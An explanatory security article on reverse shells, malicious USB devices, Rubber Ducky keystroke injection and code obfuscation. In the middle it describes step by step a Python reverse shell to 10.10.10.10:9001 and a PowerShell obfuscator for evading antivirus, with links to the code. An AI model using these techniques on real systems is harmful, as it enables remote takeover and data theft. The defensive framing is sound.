We discuss the importance of cyber security in today’s business, including threats from insiders and social engineering. You will learn about the “Reverse Shell” technique for remote system control, the use of USB devices to inject malicious code, and obfuscation to complicate detection. The main focus is on protection methods and the need to strengthen security measures to prevent such attacks.
Today, technology is an integral part of business, security of computer systems is becoming a critical aspect for any company. Their vulnerabilities are not just technical weaknesses in software or hardware. The real vulnerability, often overlooked, is people.
Insider threats to data security become especially dangerous due to the possibility of social engineering and insider cyber threats. The easiest way for an attacker to gain access to an enterprise system is to gain physical access to computers or network resources. By using, for example, USB devices that have embedded malware, attackers can easily introduce a malware into a company’s system.
“Reverse Shell” is a technique used by attackers to remotely gain control of a computer system or server without the need for physical access to the target device. The basic idea is that the attacker creates a “reverse shell” or “back channel” on the victim’s computer that allows the attacker to send commands and receive the results of those commands over the network.
This technique is extremely powerful and dangerous because it gives the attacker full access and control over the target system. The main stages of a “Reverse Shell” attack include:
System infection: An attacker must attempt to exploit a vulnerability in the target system or use social engineering to inject malicious code into the victim’s computer.
Creating a reverse shell: After successfully injecting the malicious code, the attacker creates a reverse shell or connection to his server. They establish a “tunnel” between the attacker and the victim through which they can transmit commands and receive responses.
Command execution: After installing the reverse shell, the attacker can remotely execute any commands or operations on the victim’s computer, such as deleting files, changing configurations, stealing data, and so on.
When considering the different types of “Reverse Shell”, two main options can be distinguished: TCP and HTTP. “Reverse TCP Shell” uses the TCP protocol to communicate between the attacker and the victim, while “Reverse HTTP(S) Shell” uses HTTP or HTTPS to provide a Tachtoman connection. Each of these types has its advantages and disadvantages and can be chosen according to the specific needs of the attacker.
The main areas of application of “Reverse Shell” include cyberespionage, system hacking, theft of confidential data, introduction of internal networks under the control of the attacker and other abuses. Thus, understanding this threat is essential for developing effective strategies to protect against and detect these attacks in modern cyber security systems.
Consider the methods and technologies used by attackers to inject malicious code into a computer system or network using USB devices. This type of attack can be extremely effective because USB devices are common and well accepted in today’s user environment.
Malicious USB device: An attacker creates a USB device that contains malicious code such as viruses, Trojans, keyloggers, or other malicious programs. This code can be designed to run automatically when a USB device is connected to the target computer.
Physical embodiment: An attacker can physically hide a malicious USB device in an object that can be hacked, such as a USB cable, flash drive, mouse, or even a keyboard. Once connected to the computer, the device can perform its malicious tasks without the user’s knowledge.
An example of malicious code in a programming language – python: https://pastebin.com/pVdacpHr
Import of necessary modules (socket, subprocess, os).
Creating a socket object(s) to connect to the specified IP address (10.10.10.10) and port 9001.
Redirection of standard input, output and errors to the socket (s.fileno() – get the socket file handle using the fileno() method and os.dup2() for redirection).
Import the pty module and call the spawn() function with the “sh” parameter, which starts a command-line shell available on most UNIX-like systems.
Code obfuscation is the process of transforming software code in order to complicate its analysis and understanding for humans. This is typically used to prevent attackers, anti-virus programs, or other code analysis tools from understanding or interfering.
Obfuscation can include various techniques, such as renaming variables and functions in code, adding redundant or unnecessary constructs, encrypting strings, or using complex programming language constructs to prevent easy understanding of the program’s logic.
The main purpose of obfuscation is to make the code less understandable to the reader or program analyzer without changing its functionality for the computer. This helps make it harder to detect vulnerabilities, prevent malicious code from being analyzed, and make it impossible for anti-virus programs to detect malicious activity.
Reverse shell obfuscation code (author: deeexcee-io; github – https://github.com/deeexcee-io/PowerShell-Reverse-Shell-Generator):
Entering the IP address and port.
Replacing variables in the script with random 10-character names, except for the $PSHOME variable.
Replacing some fixed phrases in the script with random strings of characters.
Replace ‘$LHOST’ and ‘LPORT’ with the entered IP address and port.
Convert IP address to hexadecimal format.
Convert port number to hexadecimal format except 65535.
Output of the modified script to the console.
Rubber Ducky – is a device created to automate attacks by imitating keyboard input.
When Rubber Ducky is connected to a computer via USB, it emulates the behavior of a keyboard by sending commands as text strings to the target computer. It allows you to perform certain actions on the system, allowing you to remotely execute commands and access important information.
When Rubber Ducky is used to reverse shell, it can execute a script that mimics keystrokes to launch a program that communicates with the attacker’s server. This server can be configured to accept a reverse connection and run commands over that connection, giving an attacker remote access to the system over the Internet.
Code example: https://pastebin.com/b631zyCY
Our research highlights the need to strengthen security measures, taking into account the possibility of introduction of malicious programs through USB ports and the use of obfuscation methods.
Disclaimer. This article is created for informational purposes only. All advice and instructions are provided for educational purposes and we are not responsible for any possible consequences related to the implementation of this project. Always use safety precautions when working with electronic components.
If you have any problems, you can contact us at [email protected].